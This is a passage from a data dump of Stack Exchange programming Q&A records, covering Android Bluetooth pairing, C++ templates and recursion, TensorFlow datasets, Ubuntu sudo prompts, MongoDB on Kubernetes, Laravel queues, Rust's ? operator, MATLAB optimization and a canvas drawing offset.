android.bluetooth.device.action.ACL_DISCONNECTED\nI\/MainService\ufe55 Service bcrcvrBluetooth: action = BluetoothDevice.ACTION_ACL_DISCONNECTED\n<\/code>\nIdeally, I would include some code to help; however, it is spread out across multiple classes, threads, and etc... The short version is that everything looks great until I receive the ACL_DISCONNECTED for some unknown reason. This throws my code into handling a case where a device that has been removed. If I could narrow my search, I'll gladly post some code.\nWhy would I receive ACL_DISCONNECTED after pairing?\nEDIT:\nFor anyone else who might make the same stupid mistake I did. It turns out that I was attempting to create the BT socket before I received ACTION_BOND_STATE_CHANGED with BOND_BONDED. This seems to have caused an ACTION_ACL_DISCONNECTED. I would have expected an error in this case, but I guess not. Problem solved\nAnswer: Just one more comment. What you are describing is valid not only for RFCOMM, but also for A2DP. Take care that the method createBond() NOT ALWAYS make the bond and profile connection (it depends on the hardware, I have tested with different)\nSo, the correct way to do that is to call createBond(), wait for BOND_BONDED event, and then make a connection to the A2DP proxy. After the A2DP_CONNECTED event, the conction is reliable\n","meta":{"source":"stackoverflow","title":"Why do I receive ACTION_ACL_DISCONNECTED after pairing","dup_signals":{}},"subset":"stackexchange"} +{"text":"Tail-recursive function to count all numbers larger than average in an array\n\nQuestion: I need to make a function that calculates the average and return the number of values larger than the average. For example, passing an array of {4, 5, 12, 17} should return 2 (because 12 and 17 are larger than the average 9.5). So far I wrote the function to return the average, but how can I make it count the numbers larger than the average and keep it tail-recursive?\n<code>int TAvg(int* a, int size, int acc=0, int num=0){ \/\/acc is the sum so far, num is the number of all elements\nif (size == 0){ \n return (acc \/ num); \n}\nreturn TAvg(a, size - 1, acc+a[size-1], num+1);}\n<\/code>\nAny help would be appreciated. Thank you.\nComment: Seems you want us to solve your homework.\nComment: \"but how can I make it count the numbers larger than the average and keep it tail-recursive?\" I don't think you can.\nComment: By *average*, you seem to have meant *arithmetic mean* specifically.\nComment: Take a look to STL ``: http:\/\/en.cppreference.com\/w\/cpp\/algorithm\nComment: And try to use `vector` instead C array and pointer. Unless it is a C question instead a C++ question, in such case I would suggest you that update the tags\nComment: Two quotes from your question (1) `int TAvg(` (2) `average 9.5`. Don't think they can work together well.\nComment: Can you write a separate tail-recursive function that calculates number of array elements above a given value?\nAnswer: Once your tail-recursive function calculates the average on the final recursion call, and starts unwinding the call stack, as its unwinding the recursive calls it now knows what the average is.\nIt can now compare the average with each element, as its unwinding all the recursion calls, and increment a counter for each element is above the computed average.\nEDIT: I thought of another approach that implements more of a spirit of a tail-recursive design. Have your function return a class:\n<code>class result {\n\npublic:\n\n int average;\n int counter;\n\n result(int average, int last_value) : average(average), counter(0)\n {\n if (last_value > average)\n ++counter;\n }\n\n result(const result &prev_result, int next_value) : average(prev_result.average), counter(prev_result.counter)\n {\n if (next_value > average)\n ++counter;\n }\n};\n<\/code>\nNow your tail-recursive function can compute the result by:\n\nThe initial recursive call (or the last recursive call, depending on one's point of view), would construct <code>result<\/code> by using the first constructor, using the computed average, and the first\/last value in the array:\n<code>return result(TAvg(computed_average_goes_here, *acc));\n<\/code>\nThe remaining tail-recursive calls become:\n<code>return result( TAvg( \/* resursive parameters *\/), *acc);\n<\/code>\nComment: A tail recursive function **does not** unwind the stack. That's the point of it being tail-recursive. It can be compiled to code that doesn't use call stack at all.\nComment: Exactly, but how do i do that? and where should i place the counter? since it's tail-recursive nothing should be written after the call.\nComment: There is no law that says that \"nothing should be written after the call\" does not make it tail recursive. You can have your tail-recursive function return a std::pair, the average, and the counter, and turn your recursive call into `update(TAvg(...), *acc)`, with `update()` comparing `*acc` with the first value in the pair, and incrementing the second value, and returning the updated pair.\n","meta":{"source":"stackoverflow","title":"Tail-recursive function to count all numbers larger than average in an array","dup_signals":{}},"subset":"stackexchange"} +{"text":"C++ templates problem\n\nQuestion: I have defined a generic tree-node class like this:\n<code>template<class DataType>\nclass GenericNode\n{\npublic:\n GenericNode() {}\n\n GenericNode(const DataType & inData) : mData(inData){}\n\n const DataType & data() const\n { return mData; }\n\n void setData(const DataType & inData)\n { mData = inData; }\n\n size_t getChildCount() const\n { return mChildren.size(); }\n\n const GenericNode * getChild(size_t idx) const\n { return mChildren[idx]; }\n\n GenericNode * getChild(size_t idx)\n { return mChildren[idx]; }\n\n void addChild(GenericNode * inItem)\n { mChildren.push_back(inItem); }\n\nprivate:\n DataType mData;\n typedef std::vector<GenericNode*> Children;\n Children mChildren;\n};\ntypedef GenericNode<std::string> TreeItemInfo;\n<\/code>\nAnd I would like to make it more generic by making the child pointer type customizable. For example to allow using a smart pointer type. Naively I tried this:\n<code>template<class DataType, class ChildPtr>\nclass GenericNode\n{\npublic:\n GenericNode() {}\n\n GenericNode(const DataType & inData) : mData(inData){}\n\n const DataType & data() const\n { return mData; }\n\n void setData(const DataType & inData)\n { mData = inData; }\n\n size_t getChildCount() const\n { return mChildren.size(); }\n\n const ChildPtr getChild(size_t idx) const\n { return mChildren[idx]; }\n\n ChildPtr getChild(size_t idx)\n { return mChildren[idx]; }\n\n void addChild(ChildPtr inItem)\n { mChildren.push_back(inItem); }\n\nprivate:\n DataType mData;\n typedef std::vector<ChildPtr> Children;\n Children mChildren;\n};\n\ntypedef GenericNode<std::string, GenericNode<std::string > * > TreeItemInfo;\n<\/code>\nHowever, that doesn't work of course because I need to specify the second parameter for the second parameter for the second parameter etc... into eternity.\nIs there a way to solve this puzzle?\nEDIT\nI found a solution based on @Asaf's answer. For those interested, below is a full code sample (comments are welcome).\nEDIT2\nI modified the interface so that externally always raw pointers are used.\n<code>#include <string>\n#include <vector>\n#include <boost\/shared_ptr.hpp>\n#include <assert.h>\n\ntemplate <class PointeeType>\nstruct NormalPointerPolicy\n{\n typedef PointeeType* PointerType;\n\n static PointeeType* getRaw(PointerType p)\n {\n return p;\n }\n};\n\ntemplate <class PointeeType>\nstruct SharedPointerPolicy\n{\n typedef boost::shared_ptr<PointeeType> PointerType;\n\n static PointeeType* getRaw(PointerType p)\n {\n return p.get();\n }\n};\n\ntemplate <class DataType, template <class> class PointerPolicy>\nclass GenericNode\n{\npublic: \n GenericNode() { }\n\n GenericNode(const DataType & inData) : mData(inData) { }\n\n typedef GenericNode<DataType, PointerPolicy> This;\n\n typedef typename PointerPolicy<This>::PointerType ChildPtr;\n\n const This * getChild(size_t idx) const\n { return PointerPolicy<This>::getRaw(mChildren[idx]); }\n\n This * getChild(size_t idx)\n { return PointerPolicy<This>::getRaw(mChildren[idx]); }\n\n void addChild(This * inItem)\n { \n ChildPtr item(inItem);\n mChildren.push_back(item);\n }\n\n const DataType & data() const\n { return mData; }\n\n void setData(const DataType & inData)\n { mData = inData; }\n\nprivate:\n DataType mData;\n std::vector<ChildPtr> mChildren;\n};\n\ntypedef GenericNode<std::string, NormalPointerPolicy> SimpleNode;\ntypedef GenericNode<std::string, SharedPointerPolicy> SmartNode;\n\nint main()\n{\n SimpleNode simpleNode;\n simpleNode.addChild(new SimpleNode(\"test1\"));\n simpleNode.addChild(new SimpleNode(\"test2\"));\n SimpleNode * a = simpleNode.getChild(0);\n assert(a->data() == \"test1\");\n const SimpleNode * b = static_cast<const SimpleNode>(simpleNode).getChild(1);\n assert(b->data() == \"test2\");\n\n SmartNode smartNode;\n smartNode.addChild(new SmartNode(\"test3\"));\n smartNode.addChild(new SmartNode(\"test4\"));\n SmartNode * c = smartNode.getChild(0);\n assert(c->data() == \"test3\");\n SmartNode * d = static_cast<const SmartNode>(smartNode).getChild(1);\n assert(d->data() == \"test4\");\n return 0;\n}\n<\/code>\nAnswer: Not the way you look at it. You should combine some kind of inheritance here.\nTry this, for example:\n<code>template <class PointeeType>\nstruct NormalPointerPolicy\n{\n typedef PointeeType* PointerType;\n};\n\ntemplate <class PointeeType>\nstruct SmartPointerPolicy\n{\n typedef MySmartPtrClass<PointeeType> PointerType;\n};\n\ntemplate <class DataType>\nclass BaseGenericNode\n{\npublic:\n BaseGenericNode() {}\n\n BaseGenericNode(const DataType & inData) : mData(inData){}\n\n const DataType & data() const\n { return mData; }\n\n void setData(const DataType & inData)\n { mData = inData; }\n\nprotected:\n DataType mData;\n\n};\n\ntemplate <class DataType, template <class> class PointerPolicy>\nclass GenericNode : public BaseGenericNode<DataType>\n{\n typedef typename PointerPolicy<BaseGenericNode<DataType> >::PointerType ChildPtr;\n\nprivate:\n typedef std::vector<ChildPtr> Children;\n Children mChildren;\n};\n<\/code>\nThe GenericNode is the actual node type, which holds the base type 'BaseGenericNode'.\nThe base type holds the actual data (and its related functionality), and the derived class holds the links to other nodes.\nThere are 2 template policy classes for how your pointer actually looks like, and you use them like this:\n<code>GenericNode<int, NormalPointerPolicy> instance;\nGenericNode<int, SmartPointerPolicy> instance;\n<\/code>\nThe problem (or advantage?) of this implementation is that a node with pointers of one kind, can hold child nodes with pointers of another kind.\n","meta":{"source":"stackoverflow","title":"C++ templates problem","dup_signals":{}},"subset":"stackexchange"} +{"text":"Using tf.data.experimental.make_csv_dataset for time series data\n\nQuestion: How do I use <code>tf.data.experimental.make_csv_dataset<\/code> with CSV files containing time series data?\n<code>building_dataset = tf.data.experimental.make_csv_dataset(file_pattern=csv_file,\n batch_size=5,num_epochs=1, shuffle=False,select_columns=feature_columns)\n<\/code>\nAnswer: It is assumed that the CSV file is already sorted w.r.t. time. First, read the CSV file using:\n<code>building_dataset = tf.data.experimental.make_csv_dataset(file_pattern=csv_file,\n batch_size=5,num_epochs=1, shuffle=False,select_columns=feature_columns)\n<\/code>\nThen define a <code>pack_features_vector<\/code> to convert to a features vector and unbatch using flat_map(). The tensors are also cast to float32.\n<code>def pack_features_vector(features):\n \"\"\"Pack the features into a single array.\"\"\"\n \n features = tf.stack([tf.cast(x,tf.float32) for x in list(features.values())], axis=1)\n return features\n\n \nbuilding_dataset = building_dataset.map(pack_features_vector)\nbuilding_dataset = building_dataset.flat_map(lambda x: tf.data.Dataset.from_tensor_slices(x))\nfor feature in building_dataset.take(1):\n print('Stacked tensor:',feature)\n<\/code>\nThen use the window and flat map method.\n<code>building_dataset = building_dataset.window(window_size, shift=1, drop_remainder=True)\nbuilding_dataset = building_dataset.flat_map(lambda window: window.batch(window_size))\n<\/code>\nThen use map method to separate features and labels.\n<code>building_dataset = building_dataset.map(lambda window: (window[:,:-1], window[-1:,-1]))\nfor feature, label in building_dataset.take(5):\n print(feature.shape)\n print('feature:',feature[:,0:4])\n print('label:',label)\n<\/code>\nFinally create batches using batch() and use as inputs to model training.\n<code>building_dataset = building_dataset.batch(32)\n<\/code>\nComment: #siby clean and clear, juste 2 question: When you \"unbatch using flat_map()\" can we just don't apply \"batch_size=5\" in the .make_csv_dataset call? Is flat_map is only to keep original orther?\n","meta":{"source":"stackoverflow","title":"Using tf.data.experimental.make_csv_dataset for time series data","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can't Type Password in Terminal\n\nQuestion: When I type any command and after that it asks for password but I can't type that. For example in terminal I type sudo apt-get update and after pressing enter, it asks for password. I type password but nothing appears in the terminal. Whatever i type it don't get typed in case of password. And for each command it asks for password. Any Solution for this? \nComment: This is how it works. The password is not echoed even with stars. Just type your password and hit Enter.\nComment: @chaskes I think it's a security precaution, i.e. the length of the password shouldn't be known either.\nComment: @chaskes Nope. This question asks for a solution, and there is pretty much nothing which can be added to the answer. I don't want to spark a discussion like \"why shouldn't the length of the password be known either?\"\nAnswer: It's typed, but you don't see stars. Try typing it then hitting Enter. Does it help?\nComment: @TrueBeliever Remember to click the checkmark if this solved your problem.\n","meta":{"source":"askubuntu","title":"Can't Type Password in Terminal","dup_signals":{}},"subset":"stackexchange"} +{"text":"User Deprecated Error Symfony 2\n\nQuestion: I am getting below error when I am going to register page !\nException detected!\nUser Deprecated: FOS\\UserBundle\\Entity\\User is deprecated. Extend FOS\\UserBundle\\Model\\User directly. in \/opt\/lampp\/htdocs\/joppers\/vendor\/friendsofsymfony\/user-bundle\/FOS\/UserBundle\/Entity\/User.php line 23\n500 Internal Server Error - ErrorException \nwhat should i do to resolve this error ? \nnew to symfony 2 .\nAnswer: You should extend <code>FOS\\UserBundle\\Model\\User<\/code> directly. Not <code>FOS\\UserBundle\\Entity\\User<\/code> that was used in older versions. And read the documentation for your version or check CHANGELOGs.\n","meta":{"source":"stackoverflow","title":"User Deprecated Error Symfony 2","dup_signals":{}},"subset":"stackexchange"} +{"text":"CrashLoopBackOff (Mongo in Docker\/Kubernetes) - Failed to start up WiredTiger under any compatibility version\n\nQuestion: I'm suddenly facing some issues in my Kubernetes application (with no event to explain it). The application has been working properly during one year but now I'm getting a CrashLoopBackOff status.\n\nIMPORTANT UPDATE:\nI cannot update the Mongo replication controller in GKE, because when I commit the changes in mongo.yml (from GIT) all workloads update except mongo-controller (which is down).\nIn GKE in Workloads\/Mongo-controller\/Managed pods I can see that the \"Created on\" date is some days ago when the app was up. The rest of pods are updating with my commits. I don't want to delete the Mongo pod, because I suppose that we'd lost the database info\/content. (The developer who created the cluster pipeline didn't schedule a backup).\n\nDatabase: MongoDB (latest, not sure what was the one running properly)\nOS: Pod running on Ubuntu 18.04\nCLuster: Google Cloud Kubernetes Engines (a.k.a GKE)\nKubectl get pods\n<code>mongo-controller-dgkkg 0\/1 CrashLoopBackOff 1199 4d6h\n<\/code>\nLogs of Mongo POD\nAutomatically disabling TLS 1.0, to force-enable TLS 1.0 specify --sslDisabledProtocols 'none'\nNo TransportLayer configured during NetworkInterface startup\"}\nImplicit TCP FastOpen unavailable. If TCP FastOpen is required, set tcpFastOpenServer, tcpFastOpenClient, and tcpFastOpenQueueSize.\nMongoDB starting\",\"attr\":{\"pid\":1,\"port\":27017,\"dbPath\":\"\/data\/db\",\"architecture\":\"64-bit\",\"host\":\"mongo-controller-dgkkg\"}\nBuild Info\",\"attr\":{\"buildInfo\":{\"version\":\"4.4.1\",\"gitVersion\":\"ad91a93a5a31e175f5cbf8c69561e788bbc55ce1\",\"openSSLVersion\":\"OpenSSL 1.1.1 11 Sep 2018\",\"modules\":[],\"allocator\":\"tcmalloc\",\"environment\":{\"distmod\":\"ubuntu1804\",\"distarch\":\"x86_64\",\"target_arch\":\"x86_64\"}}}\nOperating System\",\"attr\":{\"os\":{\"name\":\"Ubuntu\",\"version\":\"18.04\"}}\nOptions set by command line\",\"attr\":{\"options\":{\"net\":{\"bindIp\":\"*\"}}}\nStorage engine to use detected by data files\",\"attr\":{\"dbpath\":\"\/data\/db\",\"storageEngine\":\"wiredTiger\"}\nUsing the XFS filesystem is strongly recommended with the WiredTiger storage engine. See http:\/\/dochub.mongodb.org\/core\/prodnotes-filesystem\",\"tags\":[\"startupWarnings\"]\nOpening WiredTiger\",\"attr\":{\"config\":\"create,cache_size=1336M,session_max=33000,eviction=(threads_min=4,threads_max=4),config_base=false,statistics=(fast),log=(enabled=true,archive=true,path=journal,compressor=snappy),file_manager=(close_idle_time=100000,close_scan_interval=10,close_handle_minimum=250),statistics_log=(wait=0),verbose=[recovery_progress,checkpoint_progress,compact_progress]\nFailed to start up WiredTiger under any compatibility version. This may be due to an unsupported upgrade or downgrade.\nTerminating.\",\"attr\":{\"reason\":\"95: Operation not supported\"}}\nFatal assertion\",\"attr\":{\"msgid\":28595,\"file\":\"src\/mongo\/db\/storage\/wiredtiger\/wiredtiger_kv_engine.cpp\",\"line\":1101}}\n\\n\\n***aborting after fassert() failure\\n\\n\nMy Mongo.yml:\n<code>apiVersion: v1\nkind: Service\nmetadata:\n name: mongo\n namespace: $KUBE_NAMESPACE-$CI_ENVIRONMENT_SLUG\n labels:\n name: mongo\nspec:\n ports:\n - port: 27017\n targetPort: 27017\n selector:\n name: mongo\n---\napiVersion: v1\nkind: ReplicationController\nmetadata:\n name: mongo-controller\n namespace: $KUBE_NAMESPACE-$CI_ENVIRONMENT_SLUG\n labels:\n name: mongo\nspec:\n replicas: 1\n template:\n metadata:\n labels:\n name: mongo\n spec:\n containers:\n - image: mongo\n name: mongo\n ports:\n - name: mongo\n containerPort: 27017\n hostPort: 27017\n volumeMounts:\n - name: mongo-persistent-storage\n mountPath: \/data\/db\n volumes:\n - name: mongo-persistent-storage\n gcePersistentDisk:\n pdName: mongo-disk-$CI_ENVIRONMENT_SLUG\n fsType: ext4\n<\/code>\nPD: Maybe I should update my ReplicationController to Deployment (recommended), but being a database container we always configure it in that way. However I tried that, and nothing changed.\nComment: Maybe you mongo image was update because you aren't specifying a tag, it means you are always pulling the latest version. Do you know the stable version you are runnig before?\nComment: What's the best practice to specify the tag version of Mongo? Thank\nComment: I have the same issue, but in my case it just installed on a new server. I'm testing MongoDb on ARM and does not start because this message.\nComment: @AlexAcc, [Here](https:\/\/hub.docker.com\/_\/mongo?tab=description) you can find all tags. Do you know what version the version that was working?\nAnswer: I solved this issue editing the Replication Controller online from the Google Cloud Console.\nAccess to: \"Kubernetes Engine\" > \"Workload\" > \"mongo-controller\" > \"Managed pods\" > \"mongo-controller-XXXXX\"\n...and press EDIT button (in the top navbar). You can edit the configuration online in real time. I simply specified the Mongo version (4.2.10) in the image, and everything woked as expected.\n<code> spec:\n replicas: 1\n selector:\n name: mongo\n template:\n metadata:\n creationTimestamp: null\n labels:\n name: mongo\n spec:\n containers:\n - image: mongo: 4.2.10\n\n (...)\n<\/code>\n","meta":{"source":"stackoverflow","title":"CrashLoopBackOff (Mongo in Docker\/Kubernetes) - Failed to start up WiredTiger under any compatibility version","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is it possible to balance queued jobs per user\n\nQuestion: User A can trigger a process that can dispatch over 1,000 jobs to a queue. If user B triggers the same process they need to wait until user's A jobs are finished since its the same job on the same queue.\nIs it possible to balance jobs based on users? So in above case, it should process jobs from user A and B simultaneously, slowing down the jobs of user A to accommodate user B.\nI am using horizon, but not sure how to setup above configuration.\n<code>\/\/ dispatch 1000 jobs for user A and B on different requests\nProcessCSV::dispatch()->onQueue('default');\n\n\/\/ horizon.php\n'supervisor' => [\n 'connection' => 'redis',\n 'queue' => ['default'],\n 'balance' => 'auto',\n ...\n]\n<\/code>\nThe only way I could think of accomplishing my use case is having some random queues, however this is not ideal, as the same random numbers might happen between requests, and if more users trigger the jobs it will also not work as expected.\nFor example:\n<code>\/\/ request A dispatch 1000 jobs for user A\n$userA = rand(1, 5);\nProcessCSV::dispatch()->onQueue($userA);\n\n\/\/ request B dispatch 1000 jobs for user B\n$userB = rand(1, 5);\nProcessCSV::dispatch()->onQueue($userB);\n\n\/\/ horizon.php\n'supervisor' => [\n 'connection' => 'redis',\n 'queue' => ['1', '2', '3', '4', '5'],\n 'balance' => 'auto',\n ...\n]\n<\/code>\nComment: You can use [unique queue jobs](https:\/\/laravel.com\/docs\/10.x\/queues#unique-jobs) and return the user id in method `uniqueId`. So one job for each user will run only one time at same time\nComment: why would you want to do that? instead of user A waiting 2 min and user B waiting 4 min, now both users would need to wait 4 min, since they would both finish around the same time.\nComment: @ArayikG. thanks for the suggestions, might be useful, but I want to run multiple jobs per user at the same time...\nComment: @krisgjika it could take over 30 min to process 1,000 jobs, and I am showing a progress bar to users. I want to distribute the load among users so they can see some progress\nComment: @BernardWiesner a queue is a first in, first out system, without knowing your exact use case, I would say it would be better to tell the user that their process is pending, and you can even update them on their place on the queue, and after it's their turn you can update them on the progress of their job.\nAnswer: In the end I decided to use a combination of <code>Bus::batch<\/code> and multiple queues. I check which queue is free and pick that queue. If all are busy I just pick the first one. It works well with progress bars and for load balancing the same jobs among queues.\n<code>$jobs = [];\nforeach ($this->getData() as $data) {\n \/\/ Can contain over 1000 entries\n $jobs[] = new ProcessData($data);\n}\n\nBus::batch($jobs)\n ->onQueue(Queue::getFreeQueue())\n ->dispatch();\n\n<\/code>\n<code>namespace App\\Jobs;\n\nuse Illuminate\\Bus\\BatchRepository;\n\nclass Queue\n{\n const QUEUES = [\n 'queue-1',\n 'queue-2',\n 'queue-3',\n 'queue-4',\n 'queue-5',\n ];\n\n public static function getFreeQueue(): string\n {\n $queues = array_flip(self::MIGRATE_QUEUES);\n\n \/** @var BatchRepository $batches *\/\n $batches = app(BatchRepository::class);\n $batches = $batches->get(limit: 10, before: null);\n foreach($batches as $batch) {\n \/** @var Batch $batch *\/\n if(!$batch->finished()) {\n unset($queues[$batch->queue]);\n }\n }\n $availableQueues = array_keys($queues);\n return $availableQueues[0] ?? self::QUEUES[0];\n }\n\n}\n<\/code>\nAnd horizon:\n<code>'supervisor' => [\n 'connection' => 'redis',\n 'queue' => Queue::QUEUES,\n 'balance' => 'auto',\n ...\n<\/code>\n","meta":{"source":"stackoverflow","title":"Is it possible to balance queued jobs per user","dup_signals":{}},"subset":"stackexchange"} +{"text":"Using the ? operator in a void\/unit function\n\nQuestion: I've found myself in a context where I need to do a lot of array indexing, but where i simply ignore the case where it isn't present.\nThe None case is possible, so I can't use unsafe code here; i simply want to ignore it and return early\nI end up with a lot of the following:\n<code>let Some(item) = some_vec.get(i) else { return; }\n<\/code>\nI would much prefer to be able to do something like\n<code>let item = some_vec.get(i)?;\n<\/code>\nIs there a way to have this work?\nThe only thing i can think of is to have an <code>#[inline(always)]<\/code> wrapper function that calls a private function that returns an Option, so I can use <code>?<\/code> in that context.\n<code>fn inner(i: usize) -> Option<SomeResidual>;\npub fn outer(i: usize) {\n inner(i);\n}\n\n\/\/ Some struct\/residual impl so i can use ? on some generic Option<T>\n<\/code>\nThat just feels clunky, though, and I would hope that there's a better way\nComment: You don't need `SomeResidual`; just use `Option<()>` and return `Some(())` at the end.\nComment: You could do the same with an immediately-invoked closure, which is the way I usually see people solve this kind of thing. `fn foo() { (|| { \/* ... *\/ })(); }`\nComment: I'd personally advocate for the private `inner` helper. Alternatively, is there any remotely useful result you can return from the `outer` function to get the `Option`? Even an `Option<()>` would alert the caller to whether or not an error occurred, and it would permit the `?` syntax.\nComment: Do you really need to break of the entire calculation in case the index is invalid? Or do you need to only skip part of the calculation (the part about this index)?\nAnswer: If you're ok with nightly features, you can implement your own type that can be <code>?<\/code>'d in functions returning <code>()<\/code>:\n<code>#![feature(try_trait_v2, never_type)]\nuse std::ops::{Try, FromResidual, ControlFlow};\n\n\/\/ The `Try` type we'll be using to make `?` allow returning `()`\nstruct SomeOrReturn<T>(Option<T>);\n\n\/\/ Boilerplate impl\nimpl<T> Try for SomeOrReturn<T> {\n type Output = T;\n type Residual = SomeOrReturn<!>;\n\n fn from_output(output: Self::Output) -> Self {\n Self(Some(output))\n }\n\n fn branch(self) -> ControlFlow<Self::Residual, Self::Output> {\n match self.0 {\n Some(value) => ControlFlow::Continue(value),\n None => ControlFlow::Break(SomeOrReturn(None)),\n }\n }\n}\n\n\/\/ Boilerplate impl\nimpl<T> FromResidual<SomeOrReturn<!>> for SomeOrReturn<T> {\n fn from_residual(_residual: SomeOrReturn<!>) -> Self {\n Self(None)\n }\n}\n\n\/\/ The magical impl that allows you to use `?` on `SomeOrReturn<T>`\n\/\/ inside an `fn(...) -> ()`.\nimpl FromResidual<SomeOrReturn<!>> for () {\n fn from_residual(_residual: SomeOrReturn<!>) -> Self {}\n}\n\n\/\/ Extension trait to go from an `Option<T>` to a `SomeOrReturn<T>`.\ntrait AsSomeOrReturn<T> {\n fn some_or_return(self) -> SomeOrReturn<T>;\n}\nimpl<T> AsSomeOrReturn<T> for Option<T> {\n fn some_or_return(self) -> SomeOrReturn<T> {\n SomeOrReturn(self)\n }\n}\n<\/code>\nThe <code>Try<\/code> and <code>FromResidual<\/code> impls cause a fair bit of boilerplate, and I've also added an extension trait to make the interface easier, but you could stash this away in some utils module and just use the extension trait.\nThen use it as such:\n<code>fn b() -> Option<usize>;\nfn c() -> Option<usize>;\n\nfn main() {\n let b = b().some_or_return()?;\n let c = c().some_or_return()?;\n \/\/ ...\n}\n<\/code>\n(See the playground)\n","meta":{"source":"stackoverflow","title":"Using the ? operator in a void\/unit function","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to minimize a function without using a loop\n\nQuestion: I have a function (ExpSemivariance) that creates a vector of 11 elements. This elements are then represented on a graph in a scattered diagram and I intend finding the curve (Theoretical) that best fit 'ExpSemivariance' by using mimimum residual (in this case, but any other minimization function can be used)\n<code>Nug = 5;\nSill = 7899;\nalpha = 1.7;\n\nStep = 10;\nq = 11;\n\n for i=1:q\n Theoretical(i,1) = Nug+Sill*(1-exp(-(Lag(i,1)\/R)^alpha));\n end\n Error = sum(abs(Theoretical-ExpSemivariance));\n while Step > 1\n R = R + Step;\n for i=1:q\n Theoretical(i,1) = Nug+Sill*(1-exp(-(Lag(i,1)\/R)^alpha));\n end\n error = sum(abs(Theoretical-ExpSemivariance));\n if error > Error\n R = R - Step;\n Step = Step\/2;\n else\n Error = error;\n end\n end\n<\/code>\nWith the only variable being 'R', the script above Works quite well. \nThe problem is, i am assuming alpha is 1.7. But I actually need to find the correct value of alpha (ranging from 1:2, steps 0.1) and R (ranging from 1-4000) simultaneously which best minimizes the minimizes the error (between ExpSemivariance and Theoretical). Is there an appropriate way to do this?\nThanks\nAnswer: I think you best look into mathematical optimization, because I have the impression you are trying to re-invent the wheel a bit (e.g. the <code>sum(abs(x))<\/code> is a lot less common than e.g. <code>sum(x.^2)<\/code> in optimization since the latter is quite a bit easier to solve since the derivatives of the latter are easy to compute; also, the way you choose <code>step<\/code> seems a bit uncommon to me).\nIn MATLAB, if you have the optimization toolbox, many of the relevant algorithms are already implemented for you. They are a reliable way to get good results (unless you want perfect control of the optimization algorithm you use), such that you don't have to roll your own algorithms (which are probably not as reliable). Also, if you look around on the internet, I'm quite positive you should be able to find free implementations that have similar functionality.\nApproach 1: discrete grids \/ brute force\nIf what you want, is really to minimize that misfit between your function and data for some discrete values of <code>R = {1, ..., 4000}<\/code> and <code>alpha = {1, 1.1, ..., 2}<\/code>, then I would either use a <code>for<\/code> loop over all those variables or use vectorization to possibly speed this up.\n<code>% still requires Lag, ExpSemivariance\nNug = 5;\nSill = 7899;\n\nmodel = @(R, alpha) Nug + Sill .* ( 1 - exp(-(Lag.\/R).^alpha));\ncost = @(R, alpha) sum(abs(model(R, alpha) - ExpSemivariance));\n\nR = 1:4000;\nalpha = 1:0.1:2;\n\n% this creates matrices (RR, alphaalpha) for all combinations of values (R, alpha)\n[RR, alphaalpha] = ndgrid(R, alpha);\n\n% now evaluate it over the complete grid of combinations\nerror = arrayfun(cost, RR, alphaalpha);\n\nerrorMin = min(error(:)); % compute the minimum\nidxMinimum = find(error==errorMin); % find it in your results\nRMin = RR(idxMinimum);\nalphaMin = alphaalpha(idxMinimum);\n\n% since this is 2D, you can still visualize this:\nfigure;\nmesh(R, alpha, error); hold all;\nplot3(RMin, alphaMin, errorMin, '.k')\nxlabel('R');\nylabel('alpha');\nzlabel('error');\n<\/code>\nCertainly, there are better algorithms (but I'm not familiar enough with them; all that I know is that it's in general quite a hard problem).\nAlso, note that my approach is very brute-force and hence scales quite poorly: adding more variables, or scanning over a finer grid will quickly exhaust your computer's resources. If that's the case, it really pays off to gradually scan the grid, or use multiple for loops where you keep track of the best value seen so far.\nApproach 2: continuous variables \/ optimization based\nThis is the more common problem in optimization (and, I think, also the problem you are trying to solve). It assumes that <code>R<\/code> and <code>alpha<\/code> are real values (so can take any value, possibly within a certain range), such that you can let an optimization algorithm do the looping for you to determine the values that minimize the objective function.\nIn your case, if you are sure about those ranges of <code>R<\/code> and <code>alpha<\/code>, I would look into the <code>fmincon<\/code> function. From the top of my head (i.e. no guarantees the code works), I think you should be able to call it as:\n<code>% still requires Lag, ExpSemivariance\nNug = 5;\nSill = 7899;\n\nR = [1 10 4000]; % minimum, initial guess, maximum\nalpha = [1 1.7 2 ]; % minimum, initial guess, maximum\ntheta = [R; alpha]; % parameter vector for optimization toolbox\nthetaMin = theta(:,1);\nthetaMax = theta(:,3);\nthetaInit = theta(:,2);\n\nmodel = @(R, alpha) Nug + Sill .* ( 1 - exp(-(Lag.\/R).^alpha));\nerror = @(R, alpha) sum(abs(model(R, alpha) - ExpSemivariance));\nobjective = @(theta) error(theta(1), theta(2));\n\n% execute \"help fmincon\"\/\"doc fmincon\" for more information about this\nthetaOpt = fmincon(objective, thetaInit, [], [], [], [], thetaMin, thetaMax);\nRMin = thetaOpt(1)\nalphaMin = thetaOpt(2)\n<\/code>\nThis approach generalizes quite well to more variables and to bigger ranges (in fact, even infinite ranges are feasible with this approach).\nThe actual looping happens within <code>fmincon<\/code> that uses well-tested algorithms to determine what steps it should take to improve your fit. It is not completely foolproof, as having good initial values makes it a lot more likely to obtain better values of your <code>R<\/code> and <code>alpha<\/code> in a shorter amount of time. But to learn the in-and-outs, you should really look into the theory of optimization and\/or the documentation of the optimization toolbox. If you are getting poor results, I would recommend to first try changing <code>abs(x)<\/code> to <code>(x).^2<\/code> as that is a lot easier for most optimization algorithms.\n","meta":{"source":"stackoverflow","title":"How to minimize a function without using a loop","dup_signals":{}},"subset":"stackexchange"} +{"text":"Mouse cursor doesn't match with canvas\n\nQuestion: I have question: when I'm drawing a line in canvas, it seems the mouse position doesn't match with the canvas position, so whenever I draw, there is some distance between my cursor and the drawing line .. please help me with this problem, here is my code :\n<code>$(document).ready(function(){\n\n context = document.getElementById('canvasInAPerfectWorld').getContext(\"2d\");\n\n $('#canvasInAPerfectWorld').mousedown(function(e){\n var mouseX = e.pageX - this.offsetLeft;\n var mouseY = e.pageY - this.offsetTop;\n\n paint = true;\n addClick(e.pageX - this.offsetLeft, e.pageY - this.offsetTop);\n redraw();\n });\n\n $('#canvasInAPerfectWorld').mousemove(function(e){ \n if(paint){\n addClick(e.pageX - this.offsetLeft, e.pageY - this.offsetTop, true);\n redraw();\n }\n });\n\n $('#canvasInAPerfectWorld').mouseup(function(e){\n paint = false;\n });\n\n $('#canvasInAPerfectWorld').mouseleave(function(e){\n paint = false;\n }); \n\n});\n\n var clickX = new Array();\n var clickY = new Array();\n var clickDrag = new Array();\n var paint;\n\n function addClick(x, y, dragging)\n 